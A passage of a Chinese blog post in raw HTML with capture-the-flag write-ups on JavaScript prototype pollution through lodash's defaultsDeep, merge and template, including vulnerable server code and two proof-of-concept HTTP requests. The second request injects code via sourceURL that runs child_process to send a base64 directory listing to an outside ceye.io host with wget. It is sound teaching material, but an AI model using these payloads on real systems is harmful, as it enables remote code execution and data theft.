(req.url.startsWith(<span class="string">'/blueprints/'</span>) &amp;&amp; req.method === <span class="string">'GET'</span>) &#123;</span><br><span class="line">    <span class="comment">// show an individual blueprint, including private ones</span></span><br><span class="line">    <span class="keyword">const</span> blueprintId = req.url.replace(<span class="string">'/blueprints/'</span>, <span class="string">''</span>)</span><br><span class="line">    <span class="keyword">if</span> (user.blueprints[blueprintId] === <span class="literal">undefined</span>) &#123;</span><br><span class="line">      res.end(notFoundPage)</span><br><span class="line">      <span class="keyword">return</span></span><br><span class="line">    &#125;</span><br><span class="line">    res.end(mustache.render(blueprintTemplate, &#123;</span><br><span class="line">      content: user.blueprints[blueprintId].content,</span><br><span class="line">    &#125;))</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (req.url === <span class="string">'/make'</span> &amp;&amp; req.method === <span class="string">'GET'</span>) &#123;</span><br><span class="line">    <span class="comment">// show the static blueprint creation page</span></span><br><span class="line">    res.end(makePage)</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (req.url === <span class="string">'/make'</span> &amp;&amp; req.method === <span class="string">'POST'</span>) &#123;</span><br><span class="line">    <span class="comment">// API used by the creation page</span></span><br><span class="line">    getRawBody(req, &#123;</span><br><span class="line">      limit: <span class="string">'1mb'</span>,</span><br><span class="line">    &#125;, (err, body) =&gt; &#123;</span><br><span class="line">      <span class="keyword">if</span> (err) &#123;</span><br><span class="line">        <span class="keyword">throw</span> err</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">let</span> parsedBody</span><br><span class="line">      <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="comment">// default values are easier to do than proper input validation</span></span><br><span class="line">        <span class="keyword">const</span> mergeObj = &#123;&#125;</span><br><span class="line">        mergeObj.constructor = &#123;<span class="attr">prototype</span>: user.bpProto&#125;</span><br><span class="line">        mergeObj.__proto__ = user.bpProto</span><br><span class="line">        parsedBody = _.defaultsDeep(mergeObj, <span class="built_in">JSON</span>.parse(body))</span><br><span class="line">      &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">        res.end(<span class="string">'bad json'</span>)</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      <span class="comment">// make the blueprint</span></span><br><span class="line">      <span class="keyword">const</span> blueprintId = makeId()</span><br><span class="line">      user.blueprints[blueprintId] = &#123;</span><br><span class="line">        content: parsedBody.content,</span><br><span class="line">        public: parsedBody.public,</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      res.end(blueprintId)</span><br><span class="line">    &#125;)</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    res.end(notFoundPage)</span><br><span class="line">  &#125;</span><br><span class="line">&#125;).listen(<span class="number">3000</span>, () =&gt; &#123;</span><br><span class="line">  <span class="built_in">console</span>.log(<span class="string">'listening on port 3000'</span>)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>
<p>这题关键在于lodash版本存在<code>prototype pollution</code> ，<code>x.x.x.x/make</code>这个接口可以post发送报文，并且都已json格式解析，所以参数可控 =&gt; <code>parsedBody = _.defaultsDeep(mergeObj, JSON.parse(body))</code>，其次，这里的<code>x.x.x.x/</code>提供列出所有自己创建的<code>blueprint</code>，这里就会判断<code>public</code>这个属性是否为<code>true</code>，如果是就会输出<code>content</code>。</p>
<p>那么目的就很明显了，包含<code>flag</code>的对象是<code>Object</code>,污染原型链，那么当请求时，会找到public，打印flag。</p>
<p><code>POC</code></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/make</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 192.168.117.162:3000</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0</span><br><span class="line"><span class="attribute">Accept</span>: */*</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Referer</span>: http://192.168.117.162:3000/make</span><br><span class="line"><span class="attribute">content-type</span>: application/json</span><br><span class="line"><span class="attribute">Origin</span>: http://192.168.117.162:3000</span><br><span class="line"><span class="attribute">Content-Length</span>: 45</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"><span class="attribute">Cookie</span>: user_id=15e9de52d93fb13deeb4c44aeaab9767</span><br><span class="line"></span><br><span class="line">&#123;"constructor":&#123;"prototype":&#123;"public":true&#125;&#125;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/27/javascript-proto-attack/7.png" alt></p>
<h2 id="Code-breaking-thejs"><a href="#Code-breaking-thejs" class="headerlink" title="Code-breaking_thejs"></a>Code-breaking_thejs</h2><p><code>server.js</code></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">....</span><br><span class="line">app.engine(<span class="string">'ejs'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">filePath, options, callback</span>) </span>&#123; <span class="comment">// define the template engine</span></span><br><span class="line">    fs.readFile(filePath, (err, content) =&gt; &#123;</span><br><span class="line">        <span class="keyword">if</span> (err) <span class="keyword">return</span> callback(<span class="keyword">new</span> <span class="built_in">Error</span>(err))</span><br><span class="line">        <span class="keyword">let</span> compiled = lodash.template(content)</span><br><span class="line">        <span class="keyword">let</span> rendered = compiled(&#123;...options&#125;)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> callback(<span class="literal">null</span>, rendered)</span><br><span class="line">    &#125;)</span><br><span class="line">&#125;)</span><br><span class="line">app.set(<span class="string">'views'</span>, <span class="string">'./views'</span>)</span><br><span class="line">app.set(<span class="string">'view engine'</span>, <span class="string">'ejs'</span>)</span><br><span class="line"></span><br><span class="line">app.all(<span class="string">'/'</span>, (req, res) =&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> data = req.session.data || &#123;<span class="attr">language</span>: [], <span class="attr">category</span>: []&#125;</span><br><span class="line">    <span class="keyword">if</span> (req.method == <span class="string">'POST'</span>) &#123;</span><br><span class="line">        data = lodash.merge(data, req.body)</span><br><span class="line">        req.session.data = data</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    res.render(<span class="string">'index'</span>, &#123;</span><br><span class="line">        language: data.language, </span><br><span class="line">        category: data.category</span><br><span class="line">    &#125;)</span><br><span class="line">&#125;)</span><br><span class="line">....</span><br></pre></td></tr></table></figure>
<p>通读代码，发现<code>data = lodash.merge(data, req.body)</code>可能存在原型链污染，本地调试一下，发现确实可以污染原型<code>Object</code></p>
<p><img src="/2019/11/27/javascript-proto-attack/8.png" alt></p>
<p>但是这似乎构不成什么威胁，尝试找利用点，发现模板引擎是动态渲染的：</p>
<p><code>let compiled = lodash.template(content)</code>，跟进<code>template</code>模块，找到一个可控点：</p>
<p><code>var sourceURL = &#39;sourceURL&#39; in options ? &#39;//# sourceURL=&#39; + options.sourceURL + &#39;\n&#39; : &#39;&#39;;</code>  这里会判断<code>sourceURL</code>是否在<code>options</code>里面，这里的<code>options</code>就是我们渲染的<code>contents</code>，也是我们可控的<code>body</code>，接着它就会被拼接到<code>Function</code>函数中：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> result = attempt(<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">Function</span>(importsKeys, sourceURL + <span class="string">'return '</span> + source)</span><br><span class="line"></span><br><span class="line">  .apply(<span class="literal">undefined</span>, importsValues);</span><br><span class="line"></span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>所以这里可以造成任意JS执行。</p>
<p><code>POC</code></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: 192.168.117.163:8086</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0</span><br><span class="line"><span class="attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Content-Type</span>: application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span>: 178</span><br><span class="line"><span class="attribute">Origin</span>: http://192.168.117.163:8086</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"><span class="attribute">Referer</span>: http://192.168.117.163:8086/</span><br><span class="line"><span class="attribute">Cookie</span>: thejs.session=s%3A3qJOdOxa4JXfMdVXkud3T1BpgZ8ZZ0Zx.IE148Xmg7b4DB7Ww6nN4wafmviq77qGCJjVayfNUEJU</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span>: 1</span><br><span class="line"></span><br><span class="line">&#123;"language":&#123;"__proto__":&#123;"__proto__":&#123;"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process').exec('wget http://xxxx.ceye.io/?$(cd /;ls|base64)')"&#125;&#125;&#125;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2019/11/27/javascript-proto-attack/9.png" alt></p>
<h2 id="END"><a href="#END" class="headerlink" title="END"></a>END</h2><p> <code>Knowledge surface determines attack surface, knowledge chain determines kill chain</code> </p>

        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>

        <div id="lv-container">
        </div>

    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <a></>Copyright © Monitor's Blog 2019-2020</a>
    </p>
    
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = ""
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>
<script src="/js/index.js"></script>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




</html>
